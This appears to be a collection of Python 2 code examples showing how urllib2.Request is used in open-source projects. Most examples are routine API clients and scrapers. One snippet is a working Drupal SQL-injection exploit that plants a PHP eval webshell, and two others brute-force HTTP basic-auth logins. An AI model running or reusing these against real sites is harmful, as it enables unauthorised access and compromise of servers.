The following 48 code examples, extracted from open-source Python projects, illustrate how to use urllib2.Request().
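All of the examples below follow the same basic pattern: construct a urllib2.Request, optionally attach data and headers, and pass it to urllib2.urlopen. As a minimal sketch of that pattern (Python 2; the URL, header, and payload values here are placeholder assumptions, not taken from any of the listed projects):

# Minimal sketch of the common urllib2.Request pattern (Python 2).
# The URL, header, and payload values are placeholders.
import json
import urllib2

url = 'http://example.com/api'

# GET: build the Request, optionally add headers, then open it
req = urllib2.Request(url)
req.add_header('User-Agent', 'example-client/1.0')
body = urllib2.urlopen(req).read()

# POST: passing a data argument turns the request into a POST
post = urllib2.Request(url, json.dumps({'key': 'value'}),
                       {'Content-Type': 'application/json'})
response = urllib2.urlopen(post)
print response.getcode(), response.read()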
def add_user_devices(self, serial):
    # (url, access_token, api_token) = self.get_api_conf()
    api_url = self.url + "/api/v1/user/devices"
    token = self.access_token + " " + self.api_token
    data = {'serial': serial}
    request = urllib2.Request(api_url, json.dumps(data))
    request.add_header('Authorization', token)
    request.add_header('Content-Type', 'application/json')
    try:
        urllib2.urlopen(request)
    except Exception, e:
        print e.code
        print e.read()
def remove_devices_user(self, device_list):
    # (url, access_token, api_token) = self.get_api_conf("conf/stf.conf", "renguoliang")
    for device in device_list:
        serial = device["serial"]
        api_url = self.url + "/api/v1/user/devices/%s" % serial
        print api_url
        token = self.access_token + " " + self.api_token
        request = urllib2.Request(api_url)
        request.add_header('Authorization', token)
        request.get_method = lambda: 'DELETE'
        try:
            urllib2.urlopen(request)
        except Exception, e:
            print e.code
            print e.read()
def run(self):
    data = self.getData()
    value = {
        data: {
            "type": self.data_type
        }
    }
    json_data = json.dumps(value)
    post_data = json_data.encode('utf-8')
    headers = {'Content-Type': 'application/json'}
    try:
        request = urllib2.Request('{}/hippocampe/api/v1.0/{}'.format(self.url, self.service), post_data, headers)
        response = urllib2.urlopen(request)
        report = json.loads(response.read())
        self.report(report)
    except urllib2.HTTPError:
        self.error("Hippocampe: " + str(sys.exc_info()[1]))
    except urllib2.URLError:
        self.error("Hippocampe: service is not available")
    except Exception as e:
        self.unexpectedError(e)
def send_result(email, result, title, urn):
    """
    Args:
        email (str): address to send the results
        result (obj): results to send
        title (str):
        urn (str): uniform resource name
    Returns:
        str: response from endpoint
    """
    url = 'https://mongoaud.it/results'
    headers = {'Content-type': 'application/json', 'Accept': 'application/json'}
    values = {'email': email, 'result': result, 'title': title, 'urn': urn, 'date': get_date()}
    try:
        req = urllib2.Request(url, json.dumps(values), headers)
        response = urllib2.urlopen(req)
        return response.read()
    except (urllib2.HTTPError, urllib2.URLError) as exc:
        return "Sadly enough, we are having technical difficulties at the moment, " \
               "please try again later.\n\n%s" % str(exc)
def test_download_and_verify_ok(self, mock_urlopen):
    mock_extract_tarball = self.mock_patch_object(
        self.glance.utils, 'extract_tarball')
    mock_md5 = mock.Mock()
    mock_md5.hexdigest.return_value = 'expect_cksum'
    mock_md5_new = self.mock_patch_object(
        self.glance.md5, 'new', mock_md5)
    mock_info = mock.Mock()
    mock_info.getheader.return_value = 'expect_cksum'
    mock_urlopen.return_value.info.return_value = mock_info
    fake_request = urllib2.Request('http://fakeurl.com')

    self.glance._download_tarball_and_verify(
        fake_request, 'fake_staging_path')

    mock_urlopen.assert_called_with(fake_request)
    mock_extract_tarball.assert_called_once()
    mock_md5_new.assert_called_once()
    mock_info.getheader.assert_called_once()
    mock_md5_new.return_value.hexdigest.assert_called_once()
def test_download_ok_verify_failed(self, mock_urlopen):
    mock_extract_tarball = self.mock_patch_object(
        self.glance.utils, 'extract_tarball')
    mock_md5 = mock.Mock()
    mock_md5.hexdigest.return_value = 'unexpect_cksum'
    mock_md5_new = self.mock_patch_object(
        self.glance.md5, 'new', mock_md5)
    mock_info = mock.Mock()
    mock_info.getheader.return_value = 'expect_cksum'
    mock_urlopen.return_value.info.return_value = mock_info
    fake_request = urllib2.Request('http://fakeurl.com')

    self.assertRaises(self.glance.RetryableError,
                      self.glance._download_tarball_and_verify,
                      fake_request, 'fake_staging_path')

    mock_urlopen.assert_called_with(fake_request)
    mock_extract_tarball.assert_called_once()
    mock_md5_new.assert_called_once()
    mock_md5_new.return_value.hexdigest.assert_called_once()
def update(self, docs, commitwithin=None):
    """Post list of docs to Solr, return URL and status.
    Optionally tell Solr to "commitWithin" that many milliseconds."""
    url = self.url + '/update'
    add_xml = etree.Element('add')
    if commitwithin is not None:
        add_xml.set('commitWithin', str(commitwithin))
    for doc in docs:
        xdoc = etree.SubElement(add_xml, 'doc')
        for key, value in doc.iteritems():
            if value:
                field = etree.Element('field', name=key)
                field.text = (value if isinstance(value, unicode)
                              else str(value))
                xdoc.append(field)
    request = urllib2.Request(url)
    request.add_header('Content-Type', 'text/xml; charset=utf-8')
    request.add_data(etree.tostring(add_xml, pretty_print=True))
    response = urllib2.urlopen(request).read()
    status = etree.XML(response).findtext('lst/int')
    return url, status
def _html_link_return(self, url, tag, key, value, deeper=False, second=False):
    """
    Returns links
    :param url: URL to filter
    :param key: Name of key to search in tag
    :param tag: Name of value to find
    :param value: Name of the value expected in tag
    """
    if url[0] == '/':
        url = '{0}{1}'.format(self.url, url)
    r = urllib2.Request(url)
    response = urllib2.urlopen(r)
    soup = BeautifulSoup(response, 'html.parser')
    matches = soup.findAll(tag, {key: value})
    if deeper:
        m = matches[0]
        matches = m.findAll('a')[0]['href']
    elif second:
        m = matches[0]
        matches = m.findAll('a')[1]['href']
        print m.findAll('a')
    else:
        matches = matches[0]['href']
    return '{0}{1}'.format(self.url, matches)
def execute(self):
    if hasattr(Context.g_module, 'publish'):
        Context.Context.execute(self)
    mod = Context.g_module
    rfile = getattr(self, 'rfile', send_package_name())
    if not os.path.isfile(rfile):
        self.fatal('Create the release file with "waf release" first! %r' % rfile)
    fdata = Utils.readf(rfile, m='rb')
    data = safe_urlencode([('pkgdata', fdata), ('pkgname', mod.APPNAME), ('pkgver', mod.VERSION)])
    req = Request(get_upload_url(), data)
    response = urlopen(req, timeout=TIMEOUT)
    data = response.read().strip()
    if sys.hexversion > 0x300000f:
        data = data.decode('utf-8')
    if data != 'ok':
        self.fatal('Could not publish the package %r' % data)
def compute_dependencies(self, filename=REQUIRES):
    text = Utils.readf(filename)
    data = safe_urlencode([('text', text)])
    if '--offline' in sys.argv:
        self.constraints = self.local_resolve(text)
    else:
        req = Request(get_resolve_url(), data)
        try:
            response = urlopen(req, timeout=TIMEOUT)
        except URLError as e:
            Logs.warn('The package server is down! %r' % e)
            self.constraints = self.local_resolve(text)
        else:
            ret = response.read()
            try:
                ret = ret.decode('utf-8')
            except Exception:
                pass
            self.trace(ret)
            self.constraints = parse_constraints(ret)
    self.check_errors()
def search(self, url, offset=1, maxoffset=0, title=""):
    current_offset = 0
    data = ""
    self.p.reset(title=title)
    while current_offset <= maxoffset:
        self.p.rotate()
        temp_url = re.sub(r'\[\[OFFSET\]\]', str(current_offset), url)
        try:
            headers = {'User-Agent': self.user_agent}
            req = urllib2.Request(temp_url, None, headers)
            data += urllib2.urlopen(req).read()
        except urllib2.URLError as e:
            self.display.error("Could not access [%s]" % (title))
            return data
        except Exception as e:
            print e
        current_offset += offset
    self.p.done()
    return data
def _do_trakt_auth_post(self, url, data):
    try:
        session = self.get_session()
        headers = {
            'Content-Type': 'application/json',
            'Authorization': 'Bearer ' + session,
            'trakt-api-version': '2',
            'trakt-api-key': self.CLIENT_ID
        }
        # timeout in seconds
        timeout = 5
        socket.setdefaulttimeout(timeout)
        request = urllib2.Request(url, data, headers)
        response = urllib2.urlopen(request).read()
        self.logger.info('Response: {0}'.format(response))
        return response
    except urllib2.HTTPError as e:
        self.logger.error('Unable to submit post data {url} - {error}'.format(url=url, error=e.reason))
        raise
def pContent(url):
    try:
        request_web = urllib2.Request(url)
        agent = 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.6)'
        request_web.add_header('User-Agent', agent)
        opener_web = urllib2.build_opener()
        text = opener_web.open(request_web).read()
        strreg = re.compile('(?<=href=")(.*?)(?=")')
        names = strreg.findall(text)
        opener_web.close()
        for name in names:
            if site in name or '=' in name or name.startswith('/'):
                global collected
                collected.append(name)
            elif site in name and EXT in name:
                collected.append(name)
            elif 'http://' in name:
                collected.append(name)
    except:
        pass
def GetThatShit(head_URL):
    source = ""
    global gets
    global proxy_num
    head_URL = head_URL.replace("+", arg_eva)
    request_web = urllib2.Request(head_URL)
    request_web.add_header('User-Agent', agent)
    while len(source) < 1:
        if arg_debug == "on":
            print "\n[proxy]:", proxy_list_count[proxy_num % proxy_len]+"\n[agent]:", agent+"\n[debug]:", head_URL, "\n"
        try:
            gets += 1
            proxy_num += 1
            source = proxy_list[proxy_num % proxy_len].open(request_web).read()
        except (KeyboardInterrupt, SystemExit):
            raise
        except (urllib2.HTTPError):
            print "[-] Unexpected error:", sys.exc_info()[0], "\n[-] Trying again!"
            print "[proxy]:", proxy_list_count[proxy_num % proxy_len]+"\n[agent]:", agent+"\n[debug]:", head_URL, "\n"
            break
        except:
            print "[-] Unexpected error:", sys.exc_info()[0], "\n[-] Look at the error and try to figure it out!"
            print "[proxy]:", proxy_list_count[proxy_num % proxy_len]+"\n[agent]:", agent+"\n[debug]:", head_URL, "\n"
            raise
    return source

# the guts and glory - Binary Algorithm that does all the guessing for the Blind Methodology
def GetThatShit(head_URL):
    source = ""
    global gets
    global proxy_num
    head_URL = head_URL.replace("+", arg_eva)
    request_web = urllib2.Request(head_URL)
    request_web.add_header('User-Agent', agent)
    while len(source) < 1:
        if arg_debug == "on":
            print "\n[proxy]:", proxy_list_count[proxy_num % proxy_len]+"\n[agent]:", agent+"\n[debug]:", head_URL, "\n"
        try:
            gets += 1
            proxy_num += 1
            source = proxy_list[proxy_num % proxy_len].open(request_web).read()
        except (KeyboardInterrupt, SystemExit):
            raise
        except (urllib2.HTTPError):
            print "[-] Unexpected error:", sys.exc_info()[0], "\n[-] Trying again!"
            print "[proxy]:", proxy_list_count[proxy_num % proxy_len]+"\n[agent]:", agent+"\n[debug]:", head_URL, "\n"
            break
        except:
            print "[-] Unexpected error:", sys.exc_info()[0], "\n[-] Look at the error and try to figure it out!"
            print "[proxy]:", proxy_list_count[proxy_num % proxy_len]+"\n[agent]:", agent+"\n[debug]:", head_URL, "\n"
            raise
    return source

# say hello
def getauth(url):
    req = urllib2.Request(url)
    try:
        handle = urllib2.urlopen(req)
    except IOError, e:
        pass
    else:
        print "This page isn't protected by basic authentication.\n"
        sys.exit(1)
    if not hasattr(e, 'code') or e.code != 401:
        print "\nThis page isn't protected by basic authentication."
        print 'But we failed for another reason.\n'
        sys.exit(1)
    authline = e.headers.get('www-authenticate', '')
    if not authline:
        print '\nA 401 error without a basic authentication response header - very weird.\n'
        sys.exit(1)
    else:
        return authline
def run(self):
    password = getword()
    try:
        print "-"*12
        print "User:", username, "Password:", password
        req = urllib2.Request(sys.argv[1])
        passman = urllib2.HTTPPasswordMgrWithDefaultRealm()
        passman.add_password(None, sys.argv[1], username, password)
        authhandler = urllib2.HTTPBasicAuthHandler(passman)
        opener = urllib2.build_opener(authhandler)
        fd = opener.open(req)
        print "\t\n\n[+] Login successful: Username:", username, "Password:", password, "\n"
        print "[+] Retrieved", fd.geturl()
        info = fd.info()
        for key, value in info.items():
            print "%s = %s" % (key, value)
        sys.exit(2)
    except (urllib2.HTTPError, socket.error):
        pass
def getauth(url):
    req = urllib2.Request(url)
    try:
        handle = urllib2.urlopen(req)
    except IOError, e:
        pass
    else:
        print "This page isn't protected by basic authentication.\n"
        sys.exit(1)
    if not hasattr(e, 'code') or e.code != 401:
        print "\nThis page isn't protected by basic authentication."
        print 'But we failed for another reason.\n'
        sys.exit(1)
    authline = e.headers.get('www-authenticate', '')
    if not authline:
        print '\nA 401 error without a basic authentication response header - very weird.\n'
        sys.exit(1)
    else:
        return authline
def run(self):
    username, password = getword()
    try:
        print "-"*12
        print "User:", username, "Password:", password
        req = urllib2.Request(sys.argv[1])
        passman = urllib2.HTTPPasswordMgrWithDefaultRealm()
        passman.add_password(None, sys.argv[1], username, password)
        authhandler = urllib2.HTTPBasicAuthHandler(passman)
        opener = urllib2.build_opener(authhandler)
        fd = opener.open(req)
        print "\t\n\nUsername:", username, "Password:", password, "----- Login successful!!!\n\n"
        print "Retrieved", fd.geturl()
        info = fd.info()
        for key, value in info.items():
            print "%s = %s" % (key, value)
        sys.exit(2)
    except (urllib2.HTTPError, httplib.BadStatusLine, socket.error), msg:
        print "An error occurred:", msg
        pass
def getURLContents(self, url, data=None):
    "Returns the contents of the given URL as a Unicode string"
    s = ""
    success = False
    req = Request(url, data, {'User-agent': self.useragent})
    try:
        f = urlopen(req)
        s = f.read()
        f.close()
        success = True
    except HTTPError, e:
        print 'Server error: ', e.code
        if (self.verbose and
                BaseHTTPRequestHandler.responses.has_key(e.code)):
            title, msg = BaseHTTPRequestHandler.responses[e.code]
            print title + ": " + msg
    except URLError, e:
        print 'Connection error: ', e.reason
    dammit = UnicodeDammit(s)
    return (success, dammit.unicode)
def sendRequest(self, urlString, data_=None):
    try:
        if data_ is not None:
            data = urllib.urlencode(data_)
            request = urllib2.Request(urlString, data, headers=self.headers)
        else:
            request = urllib2.Request(urlString, headers=self.headers)
        response = urllib2.urlopen(request)
    except Exception as e:
        raise AfricasTalkingGatewayException(str(e))
    else:
        self.responseCode = response.getcode()
        response = response.read()
        if self.Debug:
            print response
        return response
def getAMFRequest(self, requests):
    """
    Builds an AMF request {LEnvelope<pyamf.remoting.Envelope>} from a
    supplied list of requests.
    """
    envelope = remoting.Envelope(self.amf_version)
    if self.logger:
        self.logger.debug('AMF version: %s' % self.amf_version)
    for request in requests:
        service = request.service
        args = list(request.args)
        envelope[request.id] = remoting.Request(str(service), args)
    envelope.headers = self.headers
    return envelope
def exploit(cls, args):
    url = args['options']['target']
    webshell_url = url + '/?q=<?php%20eval(base64_decode(ZXZhbCgkX1BPU1RbZV0pOw));?>'
    payload = "name[0;insert into menu_router (path, page_callback, access_callback, " \
              "include_file, load_functions, to_arg_functions, description) values ('<" \
              "?php eval(base64_decode(ZXZhbCgkX1BPU1RbZV0pOw));?>','php_eval', '1', '" \
              "modules/php/php.module', '', '', '');#]=test&name[0]=test2&pass=test&fo" \
              "rm_id=user_login_block"
    if args['options']['verbose']:
        print '[*] Request URL: ' + url
        print '[*] POST Content: ' + payload
    urllib2.urlopen(url, data=payload)
    request = urllib2.Request(webshell_url, data="e=echo strrev(gwesdvjvncqwdijqiwdqwduhq);")
    response = urllib2.urlopen(request).read()
    if 'gwesdvjvncqwdijqiwdqwduhq'[::-1] in response:
        args['success'] = True
        args['poc_ret']['vul_url'] = url
        args['poc_ret']['Webshell'] = webshell_url
        args['poc_ret']['Webshell_PWD'] = 'e'
        return args
    args['success'] = False
    return args
def retrieve_content(url, data=None):
    """
    Retrieves page content from given URL
    """
    try:
        req = urllib2.Request("".join(url[i].replace(' ', "%20") if i > url.find('?') else url[i] for i in xrange(len(url))), data, {"User-agent": NAME, "Accept-encoding": "gzip, deflate"})
        resp = urllib2.urlopen(req, timeout=TIMEOUT)
        retval = resp.read()
        encoding = resp.headers.get("Content-Encoding")
        if encoding:
            if encoding.lower() == "deflate":
                data = StringIO.StringIO(zlib.decompress(retval, -15))
            else:
                data = gzip.GzipFile("", "rb", 9, StringIO.StringIO(retval))
            retval = data.read()
    except Exception, ex:
        retval = ex.read() if hasattr(ex, "read") else getattr(ex, "msg", str())
    return retval or ""
def _rest_request(self, url, data, session, verb):
    headers = {'Content-type': 'application/json'}
    if session:
        headers["Cookie"] = "session_cookie=%s" % session
    LOG.debug("verb:%(verb)s url:%(url)s "
              "headers:%(headers)s data:%(data)s",
              {'verb': verb, 'url': url,
               'headers': headers, 'data': data})
    request = urllib2.Request(url, data, headers)
    request.get_method = lambda: verb
    response = urllib2.urlopen(request)
    code = response.code
    result = response.read()
    log_result = result
    if len(result) > LOG_STRING_LEN:
        log_result = result.replace("\n", "")[:LOG_STRING_LEN] + " ..."
    LOG.debug("code:%(code)s result:%(result)s",
              {'code': code, 'result': log_result})
    if code not in range(200, 300):
        raise BCFRestError(code=code, result=result,
                           method=verb, url=url, data=data)
    return (code, result)
def respond_to_checkpoint(self, response_code):
    headers = {
        'User-Agent': self.USER_AGENT,
        'Origin': 'https://i.instagram.com',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
        'Accept-Language': 'en-US',
        'Accept-Encoding': 'gzip',
        'Referer': self.endpoint,
        'Cookie': self.cookie,
    }
    req = Request(self.endpoint, headers=headers)
    data = {'csrfmiddlewaretoken': self.csrftoken, 'response_code': response_code}
    res = urlopen(req, data=urlencode(data).encode('ascii'), timeout=self.timeout)
    if res.info().get('Content-Encoding') == 'gzip':
        buf = BytesIO(res.read())
        content = gzip.GzipFile(fileobj=buf).read().decode('utf-8')
    else:
        content = res.read().decode('utf-8')
    return res.code, content
def DownloadSetting(url):
    list = []
    try:
        req = urllib2.Request(url)
        req.add_header('User-Agent', 'VAS')
        response = urllib2.urlopen(req)
        link = response.read()
        response.close()
        xx = re.compile('<td><a href="(.+?)">(.+?)</a></td>.*?<td>(.+?)</td>', re.DOTALL).findall(link)
        for link, name, date in xx:
            print link, name, date
            prelink = ''
            if not link.startswith("http://"):
                prelink = url.replace('asd.php', '')
            list.append((date, name, prelink + link))
    except:
        print "ERROR DownloadSetting %s" % (url)
    return list
def _call_ACIS(self, kwargs, **moreKwargs):
    '''
    Core method for calling the ACIS services.
    Returns python dictionary by de-serializing json response
    '''
    #self._formatInputDict(**kwargs)
    kwargs.update(moreKwargs)
    self._input_dict = self._stripNoneValues(kwargs)
    self.url = self.baseURL + self.webServiceSource
    if pyVersion == 2:      # python 2.x
        params = urllib.urlencode({'params': json.dumps(self._input_dict)})
        request = urllib2.Request(self.url, params, {'Accept': 'application/json'})
        response = urllib2.urlopen(request)
        jsonData = response.read()
    elif pyVersion == 3:    # python 3.x
        params = urllib.parse.urlencode({'params': json.dumps(self._input_dict)})
        params = params.encode('utf-8')
        req = urllib.request.urlopen(self.url, data=params)
        jsonData = req.read().decode()
    return json.loads(jsonData)
def get_target():
    global client, db
    cursor = db.Shodita.find({"bot": "Shizuka"})
    for document in cursor:
        if check_domain_mongodb(document["ip"], document["dominio"]):
            print colores.verde + "[INFO] Domain: " + document["dominio"] + " already scanned" + colores.normal
            pass
        else:
            url = "http://" + document["dominio"]
            headers = {'User-Agent': 'Mozilla 5.10'}
            request = Request(url, None, headers)
            try:
                response = urlopen(request, timeout=10)
                if response.code == 200 or response.code == "OK":
                    html = response.read()
                    if detect_wp(html, document["dominio"]) == True:
                        insert_mongodb("WordPress", document["dominio"], document["ip"])
                        print colores.verde + "[+][INFO] " + document["dominio"] + " is WordPress" + colores.normal
                    if detect_joomla(html):
                        insert_mongodb("Joomla", document["dominio"], document["ip"])
                        print colores.verde + "[+][INFO] " + document["dominio"] + " is Joomla" + colores.normal
                    if detect_drupal(html):
                        insert_mongodb("Drupal", document["dominio"], document["ip"])
                        print colores.verde + "[+][INFO] " + document["dominio"] + " is Drupal" + colores.normal
            except URLError, e:
                continue
            except httplib.BadStatusLine:
                continue
            except:
                continue
def for_rc():
    #rc = []
    apiurl = "https://zh.moegirl.org/api.php"
    format = "%Y%m%d%H%M%S"
    utc = datetime.datetime.utcnow()
    rcstart = (utc - datetime.timedelta(hours=1)).strftime(format)
    rcend = utc.strftime(format)
    parmas = urllib.urlencode({'format': 'json', 'action': 'query', 'list': 'recentchanges', 'rcstart': rcstart, 'rcend': rcend, 'rcdir': 'newer', 'rcnamespace': '0', 'rctoponly': '', 'rctype': 'edit|new', 'continue': '', 'rcprop': 'title|sizes'})
    req = urllib2.Request(url=apiurl, data=parmas)
    res_data = urllib2.urlopen(req)
    ori = res_data.read()
    rcc = json.loads(ori, object_hook=_decode_dict)
    rcc = OrderedDict(rcc)
    key = rcc['query'].keys()[0]
    lists = rcc['query'][key]
    #print type(value)
    #for i in range(len(value)):
    #    rc.append(value[i]['title'])
    return lists
def query(self, f_table, f_keyword, f_type=None, f_netmask=None):
    path = "/api/%s/keyword/%s/" % (f_table, f_keyword)
    if f_type is not None:
        path = "%srtype/%s/" % (path, FLINT_TYPES[f_type])
    if f_netmask is not None:
        path = "%smask/%s/" % (path, str(f_netmask))
    #if options.source:
    #    path = "%ssource/%s/" % (path, str(options.source))
    if self.api.startswith("http://"):
        url = "%s%s" % (self.api, path)
    else:
        url = "http://%s%s" % (self.api, path)
    req = urllib2.Request(url)
    req = self.setup_header(req, path)
    return self._do_query(req, max_retry=self.MAX_RETRY)
def send_log():
    ldir = options['logsfolder']
    dirs = [d for d in os.listdir(ldir) if os.path.isdir(os.path.join(ldir, d))]
    dirs = [os.path.join(ldir, d) for d in dirs]
    latest_subdir = max(dirs, key=os.path.getmtime)
    logfolder = latest_subdir
    logfile = os.path.join(ldir, 'compressedlogs')
    shutil.make_archive(logfile, 'zip', logfolder)
    logfile = logfile + '.zip'
    log_content = open(logfile, 'rb').read()
    encoded_log = base64.b64encode(bytes(log_content))
    data = {'encoded_log': encoded_log, 'sample_hash': options['sample_hash']}
    request = urllib2.Request(options['log-server-url'])
    request.add_header('Content-Type', 'application/json')
    response = urllib2.urlopen(request, json.dumps(data))
    if response.getcode() != 200:
        print 'Unable to send data'
def process_record(self, record, dbm):
    if self.augment_record and dbm:
        record = self.get_record(record, dbm)
    if self.unit_system is not None:
        record = weewx.units.to_std_system(record, self.unit_system)
    url = '%s/write?db=%s' % (self.server_url, self.database)
    data = self.get_data(record)
    if weewx.debug >= 2:
        logdbg('url: %s' % url)
        logdbg('data: %s' % data)
    if self.skip_upload:
        raise AbortedPost()
    req = urllib2.Request(url, data)
    req.add_header("User-Agent", "weewx/%s" % weewx.__version__)
    if self.username is not None:
        b64s = base64.encodestring(
            '%s:%s' % (self.username, self.password)).replace('\n', '')
        req.add_header("Authorization", "Basic %s" % b64s)
    req.get_method = lambda: 'POST'
    self.post_with_retries(req)
def getHtml(url, post_data=''):
    '''
    Fetch the HTML content of the given URL.
    :param url: target URL
    :param post_data: POST parameters
    :return: HTML content
    '''
    if post_data and isinstance(post_data, dict):
        data = urllib.urlencode(post_data)
        req = urllib2.Request(url, data=data)
    else:
        req = urllib2.Request(url)
    try:
        res = urllib2.urlopen(req).read()
        return res
    except Exception, e:
        print(Exception, ":", e)
def contact_zabbix_server(self, payload):
    """
    Method used to contact the Zabbix server.

    :param payload: refers to the json message to send to Zabbix
    :return: returns the response from the Zabbix API
    """
    data = json.dumps(payload)
    req = urllib2.Request('http://' + self.zabbix_host + '/zabbix/api_jsonrpc.php', data, {'Content-Type': 'application/json'})
    f = urllib2.urlopen(req)
    response = json.loads(f.read())
    f.close()
    return response
def pointer_to_json(dl_url):
    content_req = urllib2.Request(dl_url)
    content_result = urllib2.urlopen(content_req)
    output = content_result.read()
    content_result.close()
    oid = (re.search('(?m)^oid sha256:([a-z0-9]+)$', output)).group(1)
    size = (re.search('(?m)^size ([0-9]+)$', output)).group(1)
    json_data = (
        '{"operation": "download", '
        '"transfers": ["basic"], '
        '"objects": [{"oid": "%s", "size": %s}]}' % (oid, size))
    return json_data

# the get_lfs_url function makes a request to the LFS API of the GitHub repo,
# receives a JSON response, then gets the download URL from that response
# and returns it.
def get_lfs_url(json_input, lfs_url):
    req = urllib2.Request(lfs_url, json_input)
    req.add_header("Accept", "application/vnd.git-lfs+json")
    req.add_header("Content-Type", "application/vnd.git-lfs+json")
    result = urllib2.urlopen(req)
    results_python = json.load(result)
    file_url = results_python['objects'][0]['actions']['download']['href']
    result.close()
    return file_url

# --- section 3: actually doing stuff! --------------------- #
# now the fun bit: we actually get to do stuff!
# ---------------------------------------------------------- #

# if the local directory doesn't exist, we make it.
def remove_device(self, serial):
    # (url, access_token, api_token) = self.get_api_conf("conf/stf.conf", "renguoliang")
    api_url = self.url + "/api/v1/user/devices/%s" % serial
    print api_url
    token = self.access_token + " " + self.api_token
    request = urllib2.Request(api_url)
    request.add_header('Authorization', token)
    request.get_method = lambda: 'DELETE'
    try:
        urllib2.urlopen(request)
    except Exception, e:
        print e.code
        print e.read()
def _query(self, path, before=None, after=None):
    res = []
    url = '%s/lookup/%s' % (self.server, path)
    params = {}
    if self.limit:
        params['limit'] = self.limit
    if before and after:
        params['time_first_after'] = after
        params['time_last_before'] = before
    else:
        if before:
            params['time_first_before'] = before
        if after:
            params['time_last_after'] = after
    if params:
        url += '?{0}'.format(urllib.urlencode(params))
    req = urllib2.Request(url)
    req.add_header('Accept', 'application/json')
    req.add_header('X-Api-Key', self.apikey)
    http = urllib2.urlopen(req)
    while True:
        line = http.readline()
        if not line:
            break
        yield json.loads(line)
def LoadPage(self, myUrl):
    user_agent = 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36'
    accept = 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8'
    headers = {'User-Agent': user_agent, 'Accept': accept}
    print self.base_url + myUrl
    req = urllib2.Request(self.base_url + myUrl, headers=headers)
    myResponse = urllib2.urlopen(req)
    myPage = myResponse.read()
    #print myPage
    # decode the gb2312 page into unicode, then encode it as utf-8
    unicodePage = myPage.decode("gb2312", 'ignore').encode('utf-8', 'ignore')
    # print unicodePage
    return unicodePage
def linksExtractor(url, fileFormat='png'):
    tag = 'a'
    attr = 'href'
    if (fileFormat in ['png', 'jpg', 'jpeg', 'tiff', 'bmp', 'svg', 'gif']):
        tag = 'img'
        attr = 'src'
    try:
        headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64)'}
        req = urllib2.Request(url, None, headers)
        htmlDoc = urllib2.urlopen(req).read()
    except urllib2.HTTPError as err:
        print("Server Response : " + str(err.code))
        return "Server refused to connect!"
    except urllib2.URLError:
        return 'Invalid URL!'
    page = BeautifulSoup(htmlDoc, 'html.parser')
    page.prettify()
    res = []
    for link in page.find_all(tag):
        pre = link.get(attr)
        pre = str(pre)
        if (pre[-len(fileFormat):] == fileFormat):
            res.append(pre)
        else:
            pass
    if (len(res) < 1):
        return 'EMPTY'
    return res
def SendMessage(Token, message):
    url = 'https://qyapi.weixin.qq.com/cgi-bin/message/send?access_token=%s' % Token
    values = {
        "touser": "",
        "toparty": "2",
        "totag": "",
        "msgtype": "text",
        "agentid": "2",
        "text": {
            "content": message
        },
        "safe": "0"
    }
    print values
    data = json.dumps(values, ensure_ascii=False)
    req = urllib2.Request(url, data)
    req.add_header('Content-Type', 'application/json')
    req.add_header('encoding', 'utf-8')
    response = urllib2.urlopen(req)
    result = response.read().strip()
    print result
    result = json.loads(result)
    if result['errmsg'] == 'ok':
        return 'ok'
    else:
        return 'Error'